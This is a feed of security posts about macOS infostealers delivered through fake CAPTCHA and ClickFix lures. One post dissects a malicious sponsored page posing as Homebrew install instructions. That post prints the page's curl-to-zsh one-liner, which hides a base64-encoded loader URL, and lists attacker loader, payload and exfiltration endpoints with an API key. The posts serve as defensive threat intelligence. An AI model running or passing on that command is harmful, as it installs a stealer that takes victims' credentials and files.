James_inthe_box
13Infiniti Stealer – nowe zagrożenie dla użytkowników macOS. Wszystko zaczyna się od złośliwej CAPTCHA i jednego polecenia w terminalu https://sekurak.pl/infiniti-stealer-nowe-zagrozenie-dla-uzytkownikow-macos-wszystko-zaczyna-sie-od-zlosliwej-captcha-i-jednego-polecenia-w-terminalu/ #Wbiegu #CAPTCHA #Inifiniti #Macos #Malware #Stealer
Infiniti Stealer – nowe zagrożenie dla użytkowników macOS. Wszystko zaczyna się od złośliwej CAPTCHA i jednego polecenia w terminalu
Badacze bezpieczeństwa z Malwarebytes ostrzegają posiadaczy Maców przed szeroko zakrojoną kampanią malware. Cyberprzestępcy za pomocą phishingu nakłaniają użytkowników do instalacji złośliwego oprogramowania typu infostealer (Infiniti Stealer). Atak opiera się na technice ClickFix, polegającej na przekonaniu użytkownika do uruchomienia złośliwych poleceń PowerShell, pod pozorem naprawy krytycznych błędów systemowych. TLDR: Atak sam...
sekurak NewsInfiniti Stealer – nowe zagrożenie dla użytkowników macOS. Wszystko zaczyna się od złośliwej CAPTCHA i jednego polecenia w terminalu
Badacze bezpieczeństwa z Malwarebytes ostrzegają posiadaczy Maców przed szeroko zakrojoną kampanią malware. Cyberprzestępcy za pomocą phishingu nakłaniają użytkowników do instalacji złośliwego oprogramowania typu infostealer (Infiniti Stealer). Atak opiera się na technice ClickFix, polegającej na przekonaniu użytkownika do uruchomienia złośliwych poleceń PowerShell, pod pozorem naprawy krytycznych błędów systemowych. TLDR: Atak sam...
Infiniti Stealer – nowe zagrożenie dla użytkowników macOS. Wszystko zaczyna się od złośliwej CAPTCHA i jednego polecenia w terminalu
Badacze bezpieczeństwa z Malwarebytes ostrzegają posiadaczy Maców przed szeroko zakrojoną kampanią malware. Cyberprzestępcy za pomocą phishingu nakłaniają użytkowników do instalacji złośliwego oprogramowania typu infostealer (Infiniti Stealer). Atak opiera się na technice ClickFix, polegającej na przekonaniu użytkownika do uruchomienia złośliwych poleceń PowerShell, pod pozorem naprawy krytycznych błędów systemowych. TLDR: Atak sam...
Gi7w0rmNew tool for all those #Stealer #malware analysts out there:
https://crxray[.]info
Translate #Chrome #Extension IDs to their Names and Descriptions in Bulk.
Currently 174,534 Extensions in database. More related tools to come.
https://crxray[.]info
Translate #Chrome #Extension IDs to their Names and Descriptions in Bulk.
Currently 174,534 Extensions in database. More related tools to come.
securityaffairs
JosephA more sane and parseable list of indicators:
Landing page
httpX://macdev.slab[.]com/public/posts/insta-іі-with-termina-і-g40n4aau?shr=6etwxr0gksp2ltctcqv7gom7
Loaders
httpX://datasphere.us[.]com/debug/loader.sh?build=492f9e58358e8e2bc9e0414fa077e197
https://datasphere.us.com/debug/payload.applescript?build=492f9e58358e8e2bc9e0414fa077e197
Mocked User Agent for curls
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
APIs
httpX://datasphere.us[.]com/api/debug/event # initial info gathering
httpX://datasphere.us[.]com/gate # stealer upload location
httpX://datasphere.us[.]com/gate/chunk # large file uploads
httpX://datasphere.us[.]com/api/bot/heartbeat # Persistence heartbeat API
api key 61cb9c3bd1a2faa7d6613dd8e5d09e79fe95e85ab09ed6bcd6406badff5a083f
Absolute state of google, (and frankly the expectations of developers for installing things).
Setting up an older Mac to use as a new work machine, search google for brew Mac looking for the brew.sh site, first result is a sponsored link to httpX://macdev.slab[.]com/public/posts/insta-іі-with-termina-і-g40n4aau?shr=6etwxr0gksp2ltctcqv7gom7. I know it's not right but I got curious, let's see what's inside.
First link is familiar install instructions as we're used to for brew "here copy paste this code into terminal, don't ask questions". * Don't actually do this *
echo "Downloading Update: https://support.apple.com/downloads/xprotect-remediator-150.dmg" && curl -s $(echo "aHR0cHM6Ly9kYXRhc3BoZXJlLnVzLmNvbS9kZWJ1Zy9sb2FkZXIuc2g/YnVpbGQ9NDkyZjllNTgzNThlOGUyYmM5ZTA0MTRmYTA3N2UxOTc=" | base64 -d) | zsh
Aww man that base64 makes me feel good and trusting, wonder what's inside
echo 'aHR0cHM6Ly9kYXRhc3BoZXJlLnVzLmNvbS9kZWJ1Zy9sb2FkZXIuc2g/YnVpbGQ9NDkyZjllNTgzNThlOGUyYmM5ZTA0MTRmYTA3N2UxOTc=' | base64 -d | cat
httpX://datasphere.us[.]com/debug/loader.sh?build=492f9e58358e8e2bc9e0414fa077e197
hrmm, that's not brew, oh well maybe this is fine, let's check it out with urlscan, looks like me and 5 of my closest friends have had the same idea
https://urlscan.io/result/019d298d-3b24-7571-a37a-12575ae1eb84/
Another base64 blob, that truly gives me the warm and fuzzies, I'm starting to think maybe it's not brew https://pastebin.com/5cr5Nh1W
VirusTotal thinks this new blob might be a stealer https://www.virustotal.com/gui/file/54043cd8874e0eabbced73e433cfa30c75fd45364ae4f03fbda2eabca9d8d994?nocache=1
This blob grabs some basic info then pulls an osa script which appears to be the friends we made along the way (stealer)
https://www.virustotal.com/gui/file/f02758a235a220f2fa125bb6f45a49e674fd8b91f320a382e8b7017d93afbc74
Pastebin doesn't like the script so won't upload it there, can reach out if a copy is needed, but seems to be pretty well indexed
Rene RobichaudMacOS Stealer MioLab Adds ClickFix Delivery, Wallet Theft and Team API Tools
https://cybersecuritynews.com/macos-stealer-miolab/
#Infosec #Security #Cybersecurity #CeptBiro #MacOS #Stealer #MioLab #ClickFixDelivery #Wallet #APITools
A new one on me... #sentinel #stealer
https://app.any.run/tasks/0dba490a-730a-4969-9abe-388ce720fd19
Microsoft warns of #ClickFix campaign exploiting Windows Terminal for #Lumma #Stealer
https://securityaffairs.com/189046/malware/microsoft-warns-of-clickfix-campaign-exploiting-windows-terminal-for-lumma-stealer.html
#securityaffairs #hacking
https://securityaffairs.com/189046/malware/microsoft-warns-of-clickfix-campaign-exploiting-windows-terminal-for-lumma-stealer.html
#securityaffairs #hacking
